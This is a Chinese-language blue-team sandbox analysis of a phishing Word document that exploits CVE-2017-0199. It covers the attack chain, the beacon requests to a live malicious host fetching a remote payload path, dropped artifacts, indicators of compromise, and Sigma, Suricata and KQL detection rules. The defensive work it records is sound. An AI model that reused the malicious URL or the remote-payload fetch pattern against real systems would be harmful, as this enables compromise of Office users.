🛡️ BankPaymAdviceVend.Report.docx CVE-2017-0199 – 完整蓝队沙箱分析

高级恶意软件引爆 • 漏洞利用行为 • IOC • 检测工程

---

# 🎯 1. 执行摘要

本仓库记录了一个利用 **CVE-2017-0199** Microsoft Office RCE 漏洞的**真实恶意 DOCX** 文件。 该样本在 **Windows 10 ANY.RUN 沙箱**中被引爆，暴露出以下信息：

✔ 完整漏洞利用链 ✔ 到恶意域名的网络回调 (**tt.vg**) ✔ 释放的文件与临时工件 ✔ JA3 指纹 ✔ 注册表活动 ✔ 来自 WINWORD.EXE 的 HTTP/HTTPS 信标 ✔ 完整的蓝队 IOC 与检测规则

# 🔍 2. 场景背景 通过钓鱼邮件收到了一份名为 **“BankPaymAdviceVend.Report.docx”** 的文档。 引爆后，ANY.RUN 立即将其标记为**恶意**，并将其与以下内容关联： - CVE-2017-0199 Word RCE 漏洞利用 - WINWORD.EXE 进行隐蔽的 HTTP/HTTPS 连接 - 联系**恶意短域名 `tt.vg`** - 尝试获取远程 payload `/BVhaS`

# 📄 3. 样本信息

| 字段 | 值 | |-------|-------| | 文件 | `BankPaymAdviceVend.Report.docx` | | 判定 | **恶意活动** | | 标签 | `cve-2017-0199`, `exploit` | | MD5 | `22EDED727467A9A26F3FD311A12A7E` | | SHA1 | `6738D1A969193459C7C7579956269D77FED8D26F` | | SHA256 | `2E1408013503C...3D6EAF9` | | 沙箱 | Windows 10 Pro x64 | | 行为 | 漏洞利用 → 网络信标 → 释放文件 | # 🧬 4. 攻击链 (高级别图表) [ 恶意 DOCX ] │ ▼ [ 用户在 Word 中打开 ] │ ▼ [ CVE-2017-0199 漏洞触发 ] │ ▼ [ WINWORD.EXE → 通过 HTTP/HTTPS 访问 tt.vg ] │ ▼ [ 远程路径: /BVhaS (GET / HEAD / OPTIONS) ] │ ▼ [ 释放临时文件、EMF 对象、缓存文件 ] │ ▼ [ 潜在的下一阶段 payload — 服务器返回 404 ] yaml Copy code # 🌐 5. 网络行为 ## 📌 5.1 DNS 请求

只有一个域名是恶意的： | 域名 | 信誉 | |--------|------------| | **tt.vg** | 🔴 恶意 | 解析出的 IP： 188.114.96.3 188.114.97.3 172.67.138.42 (TLS v1.2) yaml Copy code ## 📡 5.2 HTTP/HTTPS 信标 Word 尝试获取： GET /BVhaS HEAD /BVhaS OPTIONS / Host: tt.vg User-Agent: Microsoft Office / MSIE 7 spoof yaml Copy code 典型的捕获请求： GET /BVhaS HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0...) Connection: Keep-Alive Host: tt.vg arduino Copy code 服务器响应： HTTP/1.1 404 Not Found yaml Copy code # 📁 6. 释放的文件

### 显著的工件 - 多个 `.tmp` 文件 - Office `.glox` 图形对象 - 浏览器缓存中的 EMF 图像： `%LOCALAPPDATA%\INetCache\Content.MSO\*.emf` - 最近文档快捷方式 `.LNK` - `index.dat` 日志 - Office 校对词典更改 # 🔐 7. 注册表与系统行为 Word 访问了： HKCU\Software\Microsoft\Office\14.0... HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings... HKLM\System\ControlSet001\Services\Tcpip\Parameters\Interfaces... yaml Copy code ✔ 对 Office 来说正常 ❌ 结合漏洞利用 = **明显的恶意行为** # 💣 8. 漏洞剖析 — CVE-2017-0199 **类型：** 远程代码执行 **触发方式：** 恶意 DOCX 无需用户交互即可加载远程 HTA **引入于：** Microsoft Word 2007–2016 **影响：** 攻击者执行任意代码 此样本尝试从以下位置加载远程 payload： http://tt.vg/BVhaS yaml Copy code # 🧩 9. IOC ## 🔥 9.1 网络指标 域名： tt.vg URL： http://tt.vg/BVhaS https://tt.vg/BVhaS IP： 188.114.96.3 188.114.97.3 172.67.138.42 shell Copy code ## 🔐 9.2 JA3 SSL 指纹 091f51a7a1c3a4504a224cc081ce9cee 46f5131e766d248db0248a86c494b71c 65005c9d9ae0f0ebeaf22c210571d482 ... yaml Copy code

🔍 10. 检测思路 (Sigma / Suricata / EDR)

本节将 BankPaymAdviceVend.Report.docx 的技术分析转化为实用的、可用于生产环境的检测工件，SOC 或 蓝队 可以立即部署它们。 它包括 Sigma 规则、Suricata IDS 特征码 和 EDR 狩猎查询。

🧾 10.1 Sigma 规则 — WINWORD → tt.vg

此 Sigma 规则用于检测 Windows 网络日志中由 WINWORD.EXE 向可疑短域名 tt.vg 发起的任何网络连接。

title: WINWORD Connecting To Suspicious Short Domain tt.vg

id: 0b2a5f3d-ttvg-word

status: experimental



logsource:

  category: network_connection

  product: windows



detection:

  selection:

    Image|endswith: '\WINWORD.EXE'

    DestinationHostname: 'tt.vg'

  condition: selection



level: high

tags:

  - attack.command_and_control

  - attack.t1071.001

  - cve.2017.0199



💡 任何过时的 Office 系统通过 WINWORD.EXE 联系 tt.vg

都应触发立即调查。







🌐 10.2 Suricata 规则 — tt.vg 上的 HTTP GET /BVhaS





一条 Suricata IDS 规则，用于识别源自 Office 的、对恶意域名 tt.vg 的 GET /BVhaS 请求。  

这可以捕获漏洞利用尝试获取 payload 的行为。




alert http $HOME_NET any -> $EXTERNAL_NET any (

    msg:"C2 – Office WINWORD GET /BVhaS on tt.vg";

    flow:established,to_server;

    http.method; content:"GET";

    http.uri; content:"/BVhaS"; nocase;

    http.host; content:"tt.vg"; nocase;

    http.user_agent; content:"MSOffice"; nocase;

    reference:cve,2017-0199;

    classtype:trojan-activity;

    sid:4200010;

    rev:1;

)



🔥 在使用 Suricata 或 Zeek 监控出站流量的环境中非常有效。







🛰️ 10.3 EDR 狩猎查询 — WINWORD + tt.vg 指标





一条 KQL (Microsoft Defender) 狩猎查询，用于识别环境中任何显示出类似向 tt.vg 或其关联 IP 地址进行恶意信标活动的机器。




DeviceNetworkEvents

| where InitiatingProcessFileName == "WINWORD.EXE"

| where RemoteUrl in ("tt.vg")

   or RemoteIp in ("188.114.96.3","188.114.97.3","172.67.138.42")



🎯 目的：将单次沙箱引爆扩展为全企业范围的狩猎。







🧩 11. 本实验展示的内容





本实验展示了您端到端分析真实世界 钓鱼 DOCX 样本的能力，遵循完整的 SOC 级方法论：





  
了解 CVE-2017-0199 如何在 Microsoft Word 内部被触发。

  
追踪 WINWORD.EXE 如何成为意料之外的 HTTP/S 客户端。

  
提取 网络 IOC（域名、URL、IP、JA3 TLS 哈希）。

  
分析 释放的文件、最近的快捷方式 和 注册表访问 以获取取证价值。

  
将所有发现转化为 Sigma、Suricata 和 EDR 狩猎查询。





换句话说——本实验并没有止步于引爆。

它像专业的 SOC 分析师一样，提取了、可操作的检测情报。









由 Ahmed Tarek 设计与编写 — 蓝队 

标签：DAST, Go语言工具, IP 地址批量处理, Metaprompt, 取证, 威胁情报, 开发者工具, 恶意软件分析, 沙箱, 漏洞分析, 网络信息收集, 路径探测